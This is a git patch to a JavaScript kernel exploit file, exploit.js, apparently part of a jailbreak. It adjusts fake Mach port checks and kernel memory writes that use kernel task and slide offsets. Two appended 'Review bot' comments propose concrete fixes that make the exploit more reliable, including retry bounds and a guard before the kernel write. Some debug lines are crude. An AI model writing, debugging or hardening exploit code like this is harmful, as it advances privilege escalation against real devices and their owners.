From afd32c3f9934e6425a77ed4b5a185b8fd6cb69a3 Mon Sep 17 00:00:00 2001
From: spv420
Date: Fri, 29 Jul 2022 12:54:14 -0400
Subject: aaaaaaaa

---
 src/js/kexp/exploit.js | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

(limited to 'src/js/kexp')

diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index e854ba0..fbca86c 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -496,7 +496,11 @@ again: while (true) {
 */
 // var fake_port = mach_ports_lookup_shit();
 printf("fuck\n");
- printf("%x\n", fake_port);
+ if (fake_port === 0 || fake_port === 0xffffffff) {
+ printf("fuck. fake port is fucked.\n");
+ continue again;
+ }
+ scall("printf", "%x\n", fake_port);
 printf("fuck\n");
 // todo: add mach_port_valid stuff
 printf("fuck\n");
@@ -504,8 +508,8 @@ again: while (true) {
 printf("fuck\n");
 write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
 printf("fuck\n");
-// write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
- write_u32(ptr, 0x73707621);
+ write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+// write_u32(ptr, 0x73707621 - BSDINFO_PID_OFFSET);
 printf("fuck\n");
 var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
 printf("fuck\n");
-- cgit v1.2.3
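Review bot: The new guard in the first hunk retries without limit — `continue again` re-enters the `again: while (true)` loop with no attempt counter, so a lookup that keeps yielding a bad fake_port spins forever instead of failing the exploit stage cleanly; I'd add a bound such as `if (++fake_port_retries > 16) { printf("fake port lookup keeps failing, giving up\n"); break again; }` ahead of the `continue`, with the counter declared before the loop. The sentinel test `fake_port === 0xffffffff` only fires if the value is an unsigned 32-bit number; if whatever produces fake_port (its assignment is outside this hunk, the visible `var fake_port = ...` line is commented out) can yield a signed -1, that case slips through, so `(fake_port >>> 0) === 0xffffffff` is the safer comparison. The `// todo: add mach_port_valid stuff` line is still open, and a two-value sentinel check is not a substitute for it. The enclosing `while (true)` loop starts and ends outside the hunk.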
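Review bot: In the second hunk `find_kerneltask()` is written into kernel memory with no check that the lookup succeeded: if it returns 0 (or its failure value, which is not visible here) the store at `ptr` becomes `kslide - BSDINFO_PID_OFFSET`, a garbage kernel write with no diagnostic, whereas the first hunk at least rejects a bad fake_port before using it. I'd split the expression and guard it, `var ktask = find_kerneltask(); if (ktask === 0) { printf("find_kerneltask failed\n"); continue again; }` then `write_u32(ptr, ktask + kslide - BSDINFO_PID_OFFSET);`. Whether the target pointer fits in 32 bits is not established by this hunk (the neighbouring `write_u32(kport + 0x50, kptr + ...)` suggests a 32-bit kernel, but if kernel addresses are 64-bit here, `write_u32` truncates and the line needs a 64-bit write). The re-commented `// write_u32(ptr, 0x73707621 - BSDINFO_PID_OFFSET);` keeps a debug sentinel (the bytes spell "spv!") in the main path; either delete it or label it, e.g. `// debug: write the "spv!" marker instead of the real task pointer`. The enclosing `while (true)` loop starts and ends outside the hunk.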